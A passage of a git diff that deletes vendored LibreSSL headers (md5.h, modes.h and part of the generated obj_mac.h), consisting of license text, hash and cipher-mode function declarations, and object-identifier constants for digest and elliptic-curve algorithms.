-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/md5.h b/thirdparty/libressl/include/openssl/md5.h
deleted file mode 100644
index e2c511c..0000000
--- a/thirdparty/libressl/include/openssl/md5.h
+++ /dev/null
@@ -1,108 +0,0 @@
-/* $OpenBSD: md5.h,v 1.20 2014/10/20 13:06:54 bcook Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#include <stddef.h>
-
-#ifndef HEADER_MD5_H
-#define HEADER_MD5_H
-#if !defined(HAVE_ATTRIBUTE__BOUNDED__) && !defined(__OpenBSD__)
-#define __bounded__(x, y, z)
-#endif
-
-#include <openssl/opensslconf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifdef OPENSSL_NO_MD5
-#error MD5 is disabled.
-#endif
-
-/*
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- * ! MD5_LONG has to be at least 32 bits wide.                     !
- * !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- */
-
-#define MD5_LONG unsigned int
-
-#define MD5_CBLOCK	64
-#define MD5_LBLOCK	(MD5_CBLOCK/4)
-#define MD5_DIGEST_LENGTH 16
-
-typedef struct MD5state_st
-	{
-	MD5_LONG A,B,C,D;
-	MD5_LONG Nl,Nh;
-	MD5_LONG data[MD5_LBLOCK];
-	unsigned int num;
-	} MD5_CTX;
-
-int MD5_Init(MD5_CTX *c);
-int MD5_Update(MD5_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int MD5_Final(unsigned char *md, MD5_CTX *c);
-unsigned char *MD5(const unsigned char *d, size_t n, unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void MD5_Transform(MD5_CTX *c, const unsigned char *b);
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/modes.h b/thirdparty/libressl/include/openssl/modes.h
deleted file mode 100644
index a532cb3..0000000
--- a/thirdparty/libressl/include/openssl/modes.h
+++ /dev/null
@@ -1,136 +0,0 @@
-/* $OpenBSD: modes.h,v 1.2 2014/06/12 15:49:30 deraadt Exp $ */
-/* ====================================================================
- * Copyright (c) 2008 The OpenSSL Project. All rights reserved.
- *
- * Rights for redistribution and usage in source and binary
- * forms are granted according to the OpenSSL license.
- */
-
-#include <stddef.h>
-
-typedef void (*block128_f)(const unsigned char in[16],
-			unsigned char out[16],
-			const void *key);
-
-typedef void (*cbc128_f)(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], int enc);
-
-typedef void (*ctr128_f)(const unsigned char *in, unsigned char *out,
-			size_t blocks, const void *key,
-			const unsigned char ivec[16]);
-
-typedef void (*ccm128_f)(const unsigned char *in, unsigned char *out,
-			size_t blocks, const void *key,
-			const unsigned char ivec[16],unsigned char cmac[16]);
-
-void CRYPTO_cbc128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-void CRYPTO_cbc128_decrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-
-void CRYPTO_ctr128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], unsigned char ecount_buf[16],
-			unsigned int *num, block128_f block);
-
-void CRYPTO_ctr128_encrypt_ctr32(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], unsigned char ecount_buf[16],
-			unsigned int *num, ctr128_f ctr);
-
-void CRYPTO_ofb128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], int *num,
-			block128_f block);
-
-void CRYPTO_cfb128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], int *num,
-			int enc, block128_f block);
-void CRYPTO_cfb128_8_encrypt(const unsigned char *in, unsigned char *out,
-			size_t length, const void *key,
-			unsigned char ivec[16], int *num,
-			int enc, block128_f block);
-void CRYPTO_cfb128_1_encrypt(const unsigned char *in, unsigned char *out,
-			size_t bits, const void *key,
-			unsigned char ivec[16], int *num,
-			int enc, block128_f block);
-
-size_t CRYPTO_cts128_encrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_cts128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-size_t CRYPTO_cts128_decrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_cts128_decrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-
-size_t CRYPTO_nistcts128_encrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_nistcts128_encrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-size_t CRYPTO_nistcts128_decrypt_block(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], block128_f block);
-size_t CRYPTO_nistcts128_decrypt(const unsigned char *in, unsigned char *out,
-			size_t len, const void *key,
-			unsigned char ivec[16], cbc128_f cbc);
-
-typedef struct gcm128_context GCM128_CONTEXT;
-
-GCM128_CONTEXT *CRYPTO_gcm128_new(void *key, block128_f block);
-void CRYPTO_gcm128_init(GCM128_CONTEXT *ctx,void *key,block128_f block);
-void CRYPTO_gcm128_setiv(GCM128_CONTEXT *ctx, const unsigned char *iv,
-			size_t len);
-int CRYPTO_gcm128_aad(GCM128_CONTEXT *ctx, const unsigned char *aad,
-			size_t len);
-int CRYPTO_gcm128_encrypt(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len);
-int CRYPTO_gcm128_decrypt(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len);
-int CRYPTO_gcm128_encrypt_ctr32(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len, ctr128_f stream);
-int CRYPTO_gcm128_decrypt_ctr32(GCM128_CONTEXT *ctx,
-			const unsigned char *in, unsigned char *out,
-			size_t len, ctr128_f stream);
-int CRYPTO_gcm128_finish(GCM128_CONTEXT *ctx,const unsigned char *tag,
-			size_t len);
-void CRYPTO_gcm128_tag(GCM128_CONTEXT *ctx, unsigned char *tag, size_t len);
-void CRYPTO_gcm128_release(GCM128_CONTEXT *ctx);
-
-typedef struct ccm128_context CCM128_CONTEXT;
-
-void CRYPTO_ccm128_init(CCM128_CONTEXT *ctx,
-	unsigned int M, unsigned int L, void *key,block128_f block);
-int CRYPTO_ccm128_setiv(CCM128_CONTEXT *ctx,
-	const unsigned char *nonce, size_t nlen, size_t mlen);
-void CRYPTO_ccm128_aad(CCM128_CONTEXT *ctx,
-	const unsigned char *aad, size_t alen);
-int CRYPTO_ccm128_encrypt(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len);
-int CRYPTO_ccm128_decrypt(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len);
-int CRYPTO_ccm128_encrypt_ccm64(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len,
-	ccm128_f stream);
-int CRYPTO_ccm128_decrypt_ccm64(CCM128_CONTEXT *ctx,
-	const unsigned char *inp, unsigned char *out, size_t len,
-	ccm128_f stream);
-size_t CRYPTO_ccm128_tag(CCM128_CONTEXT *ctx, unsigned char *tag, size_t len);
-
-typedef struct xts128_context XTS128_CONTEXT;
-
-int CRYPTO_xts128_encrypt(const XTS128_CONTEXT *ctx, const unsigned char iv[16],
-	const unsigned char *inp, unsigned char *out, size_t len, int enc);
diff --git a/thirdparty/libressl/include/openssl/obj_mac.h b/thirdparty/libressl/include/openssl/obj_mac.h
deleted file mode 100644
index 753ef10..0000000
--- a/thirdparty/libressl/include/openssl/obj_mac.h
+++ /dev/null
@@ -1,4194 +0,0 @@
-/* crypto/objects/obj_mac.h */
-
-/* THIS FILE IS GENERATED FROM objects.txt by objects.pl via the
- * following command:
- * perl objects.pl objects.txt obj_mac.num obj_mac.h
- */
-
-/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- * 
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#define SN_undef			"UNDEF"
-#define LN_undef			"undefined"
-#define NID_undef			0
-#define OBJ_undef			0L
-
-#define SN_itu_t		"ITU-T"
-#define LN_itu_t		"itu-t"
-#define NID_itu_t		645
-#define OBJ_itu_t		0L
-
-#define NID_ccitt		404
-#define OBJ_ccitt		OBJ_itu_t
-
-#define SN_iso		"ISO"
-#define LN_iso		"iso"
-#define NID_iso		181
-#define OBJ_iso		1L
-
-#define SN_joint_iso_itu_t		"JOINT-ISO-ITU-T"
-#define LN_joint_iso_itu_t		"joint-iso-itu-t"
-#define NID_joint_iso_itu_t		646
-#define OBJ_joint_iso_itu_t		2L
-
-#define NID_joint_iso_ccitt		393
-#define OBJ_joint_iso_ccitt		OBJ_joint_iso_itu_t
-
-#define SN_member_body		"member-body"
-#define LN_member_body		"ISO Member Body"
-#define NID_member_body		182
-#define OBJ_member_body		OBJ_iso,2L
-
-#define SN_identified_organization		"identified-organization"
-#define NID_identified_organization		676
-#define OBJ_identified_organization		OBJ_iso,3L
-
-#define SN_hmac_md5		"HMAC-MD5"
-#define LN_hmac_md5		"hmac-md5"
-#define NID_hmac_md5		780
-#define OBJ_hmac_md5		OBJ_identified_organization,6L,1L,5L,5L,8L,1L,1L
-
-#define SN_hmac_sha1		"HMAC-SHA1"
-#define LN_hmac_sha1		"hmac-sha1"
-#define NID_hmac_sha1		781
-#define OBJ_hmac_sha1		OBJ_identified_organization,6L,1L,5L,5L,8L,1L,2L
-
-#define SN_certicom_arc		"certicom-arc"
-#define NID_certicom_arc		677
-#define OBJ_certicom_arc		OBJ_identified_organization,132L
-
-#define SN_international_organizations		"international-organizations"
-#define LN_international_organizations		"International Organizations"
-#define NID_international_organizations		647
-#define OBJ_international_organizations		OBJ_joint_iso_itu_t,23L
-
-#define SN_wap		"wap"
-#define NID_wap		678
-#define OBJ_wap		OBJ_international_organizations,43L
-
-#define SN_wap_wsg		"wap-wsg"
-#define NID_wap_wsg		679
-#define OBJ_wap_wsg		OBJ_wap,1L
-
-#define SN_selected_attribute_types		"selected-attribute-types"
-#define LN_selected_attribute_types		"Selected Attribute Types"
-#define NID_selected_attribute_types		394
-#define OBJ_selected_attribute_types		OBJ_joint_iso_itu_t,5L,1L,5L
-
-#define SN_clearance		"clearance"
-#define NID_clearance		395
-#define OBJ_clearance		OBJ_selected_attribute_types,55L
-
-#define SN_ISO_US		"ISO-US"
-#define LN_ISO_US		"ISO US Member Body"
-#define NID_ISO_US		183
-#define OBJ_ISO_US		OBJ_member_body,840L
-
-#define SN_X9_57		"X9-57"
-#define LN_X9_57		"X9.57"
-#define NID_X9_57		184
-#define OBJ_X9_57		OBJ_ISO_US,10040L
-
-#define SN_X9cm		"X9cm"
-#define LN_X9cm		"X9.57 CM ?"
-#define NID_X9cm		185
-#define OBJ_X9cm		OBJ_X9_57,4L
-
-#define SN_dsa		"DSA"
-#define LN_dsa		"dsaEncryption"
-#define NID_dsa		116
-#define OBJ_dsa		OBJ_X9cm,1L
-
-#define SN_dsaWithSHA1		"DSA-SHA1"
-#define LN_dsaWithSHA1		"dsaWithSHA1"
-#define NID_dsaWithSHA1		113
-#define OBJ_dsaWithSHA1		OBJ_X9cm,3L
-
-#define SN_ansi_X9_62		"ansi-X9-62"
-#define LN_ansi_X9_62		"ANSI X9.62"
-#define NID_ansi_X9_62		405
-#define OBJ_ansi_X9_62		OBJ_ISO_US,10045L
-
-#define OBJ_X9_62_id_fieldType		OBJ_ansi_X9_62,1L
-
-#define SN_X9_62_prime_field		"prime-field"
-#define NID_X9_62_prime_field		406
-#define OBJ_X9_62_prime_field		OBJ_X9_62_id_fieldType,1L
-
-#define SN_X9_62_characteristic_two_field		"characteristic-two-field"
-#define NID_X9_62_characteristic_two_field		407
-#define OBJ_X9_62_characteristic_two_field		OBJ_X9_62_id_fieldType,2L
-
-#define SN_X9_62_id_characteristic_two_basis		"id-characteristic-two-basis"
-#define NID_X9_62_id_characteristic_two_basis		680
-#define OBJ_X9_62_id_characteristic_two_basis		OBJ_X9_62_characteristic_two_field,3L
-
-#define SN_X9_62_onBasis		"onBasis"
-#define NID_X9_62_onBasis		681
-#define OBJ_X9_62_onBasis		OBJ_X9_62_id_characteristic_two_basis,1L
-
-#define SN_X9_62_tpBasis		"tpBasis"
-#define NID_X9_62_tpBasis		682
-#define OBJ_X9_62_tpBasis		OBJ_X9_62_id_characteristic_two_basis,2L
-
-#define SN_X9_62_ppBasis		"ppBasis"
-#define NID_X9_62_ppBasis		683
-#define OBJ_X9_62_ppBasis		OBJ_X9_62_id_characteristic_two_basis,3L
-
-#define OBJ_X9_62_id_publicKeyType		OBJ_ansi_X9_62,2L
-
-#define SN_X9_62_id_ecPublicKey		"id-ecPublicKey"
-#define NID_X9_62_id_ecPublicKey		408
-#define OBJ_X9_62_id_ecPublicKey		OBJ_X9_62_id_publicKeyType,1L
-
-#define OBJ_X9_62_ellipticCurve		OBJ_ansi_X9_62,3L
-
-#define OBJ_X9_62_c_TwoCurve		OBJ_X9_62_ellipticCurve,0L
-
-#define SN_X9_62_c2pnb163v1		"c2pnb163v1"
-#define NID_X9_62_c2pnb163v1		684
-#define OBJ_X9_62_c2pnb163v1		OBJ_X9_62_c_TwoCurve,1L
-
-#define SN_X9_62_c2pnb163v2		"c2pnb163v2"
-#define NID_X9_62_c2pnb163v2		685
-#define OBJ_X9_62_c2pnb163v2		OBJ_X9_62_c_TwoCurve,2L
-
-#define SN_X9_62_c2pnb163v3		"c2pnb163v3"
-#define NID_X9_62_c2pnb163v3		686
-#define OBJ_X9_62_c2pnb163v3		OBJ_X9_62_c_TwoCurve,3L
-
-#define SN_X9_62_c2pnb176v1		"c2pnb176v1"
-#define NID_X9_62_c2pnb176v1		687
-#define OBJ_X9_62_c2pnb176v1		OBJ_X9_62_c_TwoCurve,4L
-
-#define SN_X9_62_c2tnb191v1		"c2tnb191v1"
-#define NID_X9_62_c2tnb191v1		688
-#define OBJ_X9_62_c2tnb191v1		OBJ_X9_62_c_TwoCurve,5L
-
-#define SN_X9_62_c2tnb191v2		"c2tnb191v2"
-#define NID_X9_62_c2tnb191v2		689
-#define OBJ_X9_62_c2tnb191v2		OBJ_X9_62_c_TwoCurve,6L
-
-#define SN_X9_62_c2tnb191v3		"c2tnb191v3"
-#define NID_X9_62_c2tnb191v3		690
-#define OBJ_X9_62_c2tnb191v3		OBJ_X9_62_c_TwoCurve,7L
-
-#define SN_X9_62_c2onb191v4		"c2onb191v4"
-#define NID_X9_62_c2onb191v4		691
-#define OBJ_X9_62_c2onb191v4		OBJ_X9_62_c_TwoCurve,8L
-
-#define SN_X9_62_c2onb191v5		"c2onb191v5"
-#define NID_X9_62_c2onb191v5		692
-#define OBJ_X9_62_c2onb191v5		OBJ_X9_62_c_TwoCurve,9L
-
-#define SN_X9_62_c2pnb208w1		"c2pnb208w1"
-#define NID_X9_62_c2pnb208w1		693
-#define OBJ_X9_62_c2pnb208w1		OBJ_X9_62_c_TwoCurve,10L
-
-#define SN_X9_62_c2tnb239v1		"c2tnb239v1"
-#define NID_X9_62_c2tnb239v1		694
-#define OBJ_X9_62_c2tnb239v1		OBJ_X9_62_c_TwoCurve,11L
-
-#define SN_X9_62_c2tnb239v2		"c2tnb239v2"
-#define NID_X9_62_c2tnb239v2		695
-#define OBJ_X9_62_c2tnb239v2		OBJ_X9_62_c_TwoCurve,12L
-
-#define SN_X9_62_c2tnb239v3		"c2tnb239v3"
-#define NID_X9_62_c2tnb239v3		696
-#define OBJ_X9_62_c2tnb239v3		OBJ_X9_62_c_TwoCurve,13L
-
-#define SN_X9_62_c2onb239v4		"c2onb239v4"
-#define NID_X9_62_c2onb239v4		697
-#define OBJ_X9_62_c2onb239v4		OBJ_X9_62_c_TwoCurve,14L
-
-#define SN_X9_62_c2onb239v5		"c2onb239v5"
-#define NID_X9_62_c2onb239v5		698
-#define OBJ_X9_62_c2onb239v5		OBJ_X9_62_c_TwoCurve,15L
-
-#define SN_X9_62_c2pnb272w1		"c2pnb272w1"
-#define NID_X9_62_c2pnb272w1		699
-#define OBJ_X9_62_c2pnb272w1		OBJ_X9_62_c_TwoCurve,16L
-
-#define SN_X9_62_c2pnb304w1		"c2pnb304w1"
-#define NID_X9_62_c2pnb304w1		700
-#define OBJ_X9_62_c2pnb304w1		OBJ_X9_62_c_TwoCurve,17L
-
-#define SN_X9_62_c2tnb359v1		"c2tnb359v1"
-#define NID_X9_62_c2tnb359v1		701
-#define OBJ_X9_62_c2tnb359v1		OBJ_X9_62_c_TwoCurve,18L
-
-#define SN_X9_62_c2pnb368w1		"c2pnb368w1"
-#define NID_X9_62_c2pnb368w1		702
-#define OBJ_X9_62_c2pnb368w1		OBJ_X9_62_c_TwoCurve,19L
-
-#define SN_X9_62_c2tnb431r1		"c2tnb431r1"
-#define NID_X9_62_c2tnb431r1		703
-#define OBJ_X9_62_c2tnb431r1		OBJ_X9_62_c_TwoCurve,20L
-
-#define OBJ_X9_62_primeCurve		OBJ_X9_62_ellipticCurve,1L
-
-#define SN_X9_62_prime192v1		"prime192v1"
-#define NID_X9_62_prime192v1		409
-#define OBJ_X9_62_prime192v1		OBJ_X9_62_primeCurve,1L
-
-#define SN_X9_62_prime192v2		"prime192v2"
-#define NID_X9_62_prime192v2		410
-#define OBJ_X9_62_prime192v2		OBJ_X9_62_primeCurve,2L
-
-#define SN_X9_62_prime192v3		"prime192v3"
-#define NID_X9_62_prime192v3		411
-#define OBJ_X9_62_prime192v3		OBJ_X9_62_primeCurve,3L
-
-#define SN_X9_62_prime239v1		"prime239v1"
-#define NID_X9_62_prime239v1		412
-#define OBJ_X9_62_prime239v1		OBJ_X9_62_primeCurve,4L
-
-#define SN_X9_62_prime239v2		"prime239v2"
-#define NID_X9_62_prime239v2		413
-#define OBJ_X9_62_prime239v2		OBJ_X9_62_primeCurve,5L
-
-#define SN_X9_62_prime239v3		"prime239v3"
-#define NID_X9_62_prime239v3		414
-#define OBJ_X9_62_prime239v3		OBJ_X9_62_primeCurve,6L
-
-#define SN_X9_62_prime256v1		"prime256v1"
-#define NID_X9_62_prime256v1		415
-#define OBJ_X9_62_prime256v1		OBJ_X9_62_primeCurve,7L
-
-#define OBJ_X9_62_id_ecSigType		OBJ_ansi_X9_62,4L
-
-#define SN_ecdsa_with_SHA1		"ecdsa-with-SHA1"
-#define NID_ecdsa_with_SHA1		416
-#define OBJ_ecdsa_with_SHA1		OBJ_X9_62_id_ecSigType,1L
-
-#define SN_ecdsa_with_Recommended		"ecdsa-with-Recommended"
-#define NID_ecdsa_with_Recommended		791
-#define OBJ_ecdsa_with_Recommended		OBJ_X9_62_id_ecSigType,2L
-
-#define SN_ecdsa_with_Specified		"ecdsa-with-Specified"
-#define NID_ecdsa_with_Specified		792
-#define OBJ_ecdsa_with_Specified		OBJ_X9_62_id_ecSigType,3L
-
-#define SN_ecdsa_with_SHA224		"ecdsa-with-SHA224"
-#define NID_ecdsa_with_SHA224		793
-#define OBJ_ecdsa_with_SHA224		OBJ_ecdsa_with_Specified,1L
-
-#define SN_ecdsa_with_SHA256		"ecdsa-with-SHA256"
-#define NID_ecdsa_with_SHA256		794
-#define OBJ_ecdsa_with_SHA256		OBJ_ecdsa_with_Specified,2L
-
-#define SN_ecdsa_with_SHA384		"ecdsa-with-SHA384"
-#define NID_ecdsa_with_SHA384		795
-#define OBJ_ecdsa_with_SHA384		OBJ_ecdsa_with_Specified,3L
-
-#define SN_ecdsa_with_SHA512		"ecdsa-with-SHA512"
-#define NID_ecdsa_with_SHA512		796
-#define OBJ_ecdsa_with_SHA512		OBJ_ecdsa_with_Specified,4L
-
-#define OBJ_secg_ellipticCurve		OBJ_certicom_arc,0L
-
-#define SN_secp112r1		"secp112r1"
-#define NID_secp112r1		704
-#define OBJ_secp112r1		OBJ_secg_ellipticCurve,6L
-
-#define SN_secp112r2		"secp112r2"
-#define NID_secp112r2		705
-#define OBJ_secp112r2		OBJ_secg_ellipticCurve,7L
-
-#define SN_secp128r1		"secp128r1"
-#define NID_secp128r1		706
-#define OBJ_secp128r1		OBJ_secg_ellipticCurve,28L
-
-#define SN_secp128r2		"secp128r2"
-#define NID_secp128r2		707
-#define OBJ_secp128r2		OBJ_secg_ellipticCurve,29L
-
-#define SN_secp160k1		"secp160k1"
-#define NID_secp160k1		708
-#define OBJ_secp160k1		OBJ_secg_ellipticCurve,9L
-
-#define SN_secp160r1		"secp160r1"
-#define NID_secp160r1		709
-#define OBJ_secp160r1		OBJ_secg_ellipticCurve,8L
-
-#define SN_secp160r2		"secp160r2"
-#define NID_secp160r2		710
-#define OBJ_secp160r2		OBJ_secg_ellipticCurve,30L
-
-#define SN_secp192k1		"secp192k1"
-#define NID_secp192k1		711
-#define OBJ_secp192k1		OBJ_secg_ellipticCurve,31L
-
-#define SN_secp224k1		"secp224k1"
-#define NID_secp224k1		712
-#define OBJ_secp224k1		OBJ_secg_ellipticCurve,32L
-
-#define SN_secp224r1		"secp224r1"
-#define NID_secp224r1		713
-#define OBJ_secp224r1		OBJ_secg_ellipticCurve,33L
-
-#define SN_secp256k1		"secp256k1"
-#define NID_secp256k1		714
-#define OBJ_secp256k1		OBJ_secg_ellipticCurve,10L
-
-#define SN_secp384r1		"secp384r1"
-#define NID_secp384r1		715
-#define OBJ_secp384r1		OBJ_secg_ellipticCurve,34L
-
-#define SN_secp521r1		"secp521r1"
-#define NID_secp521r1		716
-#define OBJ_secp521r1		OBJ_secg_ellipticCurve,35L
-
-#define SN_sect113r1		"sect113r1"
-#define NID_sect113r1		717
-#define OBJ_sect113r1		OBJ_secg_ellipticCurve,4L
-
-#define SN_sect113r2		"sect113r2"
-#define NID_sect113r2		718
-#define OBJ_sect113r2		OBJ_secg_ellipticCurve,5L
-
-#define SN_sect131r1		"sect131r1"
-#define NID_sect131r1		719
-#define OBJ_sect131r1		OBJ_secg_ellipticCurve,22L
-
-#define SN_sect131r2		"sect131r2"
-#define NID_sect131r2		720
-#define OBJ_sect131r2		OBJ_secg_ellipticCurve,23L
-
-#define SN_sect163k1		"sect163k1"
-#define NID_sect163k1		721
-#define OBJ_sect163k1		OBJ_secg_ellipticCurve,1L
-
-#define SN_sect163r1		"sect163r1"
-#define NID_sect163r1		722
-#define OBJ_sect163r1		OBJ_secg_ellipticCurve,2L
-
-#define SN_sect163r2		"sect163r2"
-#define NID_sect163r2		723
-#define OBJ_sect163r2		OBJ_secg_ellipticCurve,15L
-
-#define SN_sect193r1		"sect193r1"
-#define NID_sect193r1		724
-#define OBJ_sect193r1		OBJ_secg_ellipticCurve,24L
-
-#define SN_sect193r2		"sect193r2"
-#define NID_sect193r2		725
-#define OBJ_sect193r2		OBJ_secg_ellipticCurve,25L
-
-#define SN_sect233k1		"sect233k1"
-#define NID_sect233k1		726
-#define OBJ_sect233k1		OBJ_secg_ellipticCurve,26L
-
-#define SN_sect233r1		"sect233r1"
-#define NID_sect233r1		727
-#define OBJ_sect233r1		OBJ_secg_ellipticCurve,27L
-
-#define SN_sect239k1		"sect239k1"
-#define NID_sect239k1		728
-#define OBJ_sect239k1		OBJ_secg_ellipticCurve,3L
-
-#define SN_sect283k1		"sect283k1"
-#define NID_sect283k1		729
-#define OBJ_sect283k1		OBJ_secg_ellipticCurve,16L
-
-#define SN_sect283r1		"sect283r1"
-#define NID_sect283r1		730
-#define OBJ_sect283r1		OBJ_secg_ellipticCurve,17L
-
-#define SN_sect409k1		"sect409k1"
-#define NID_sect409k1		731
-#define OBJ_sect409k1		OBJ_secg_ellipticCurve,36L
-
-#define SN_sect409r1		"sect409r1"
-#define NID_sect409r1		732
-#define OBJ_sect409r1		OBJ_secg_ellipticCurve,37L
-
-#define SN_sect571k1		"sect571k1"
-#define NID_sect571k1		733
-#define OBJ_sect571k1		OBJ_secg_ellipticCurve,38L
-
-#define SN_sect571r1		"sect571r1"
